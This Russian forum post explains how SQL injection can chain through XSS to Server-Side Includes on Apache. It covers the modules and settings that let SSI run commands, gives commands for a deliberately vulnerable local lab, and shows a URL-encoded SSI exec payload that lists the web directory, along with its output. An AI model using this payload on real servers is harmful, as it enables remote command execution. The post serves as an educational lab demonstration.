Предполагаю, что такие вещи актуальны не только для
XSS, но и
SQL inj, когда результат запроса выводится на страницу, тоесть может быть нечто подобное
SQL inj -> XXS(SIXSS) -> SSI. Только стоит сказать один важный момент, сам
nginx хоть и имеет потдержку
SSI, но он не умееет запускать внешнюю программу, в отличии от Apache(нагуглил
gemaglabin). В Apache
SSI реализован через модуль
mod_include, но для работы
exec cmd еще нужно
mod_cgi или
mod_cgid, а также отключенная директива
IncludesNoExec, иначе в контенте на html страничке будет
[an error occurred while processing this directive] и в лог ошибок(если включен) будет падать запись:
AH01371: unknown directive "exec" in parsed doc.
Код:
sudo mkdir -p /srv/www/vuln_dev/public_html
sudo mkdir /srv/www/vuln_dev/logs
sudo chown $USER: -R /srv/www/vuln_dev/public_html
sudo nano /etc/apache2/sites-available/vuln-dev.conf
ServerAdmin vuln@locahost
ServerName vuln
DocumentRoot /srv/www/vuln_dev/public_html
AllowOverride All
Require all granted
ErrorLog /srv/www/vuln_dev/logs/error.log
LogLevel warn
sudo a2ensite vuln-dev.conf
sudo nano /etc/hosts
127.0.0.1 vuln
sudo nano /etc/apache2/mods-available/userdir.conf
#IncludesNoExec
sudo a2enmod include
sudo a2enmod cgi
sudo service apache2 restart
nano /srv/www/vuln_dev/public_html/.htaсcess
Код:
Options Includes
AddType application/x-httpd-php .html
AddOutputFilter INCLUDES .html
nano /srv/www/vuln_dev/public_html/index.html
Запрос
Код:
это %3C!--%23exec%20cmd%3D%22ls%22%20--%3E
http://vuln/?t=%3C!--%23exec%20cmd%3D%22ls%20-la%22%20--%3E
Ответ
Код HTML:
Тест
total 16
drwxr-xr-x 2 omen666 omen666 4096 May 28 04:26 .
drwxr-xr-x 4 root root 4096 May 28 01:01 ..
-rw-r--r-- 1 omen666 omen666 87 May 28 04:26 .htaccess
-rw-r--r-- 1 omen666 omen666 138 May 28 03:53 index.html
ps все пошла школота хекать )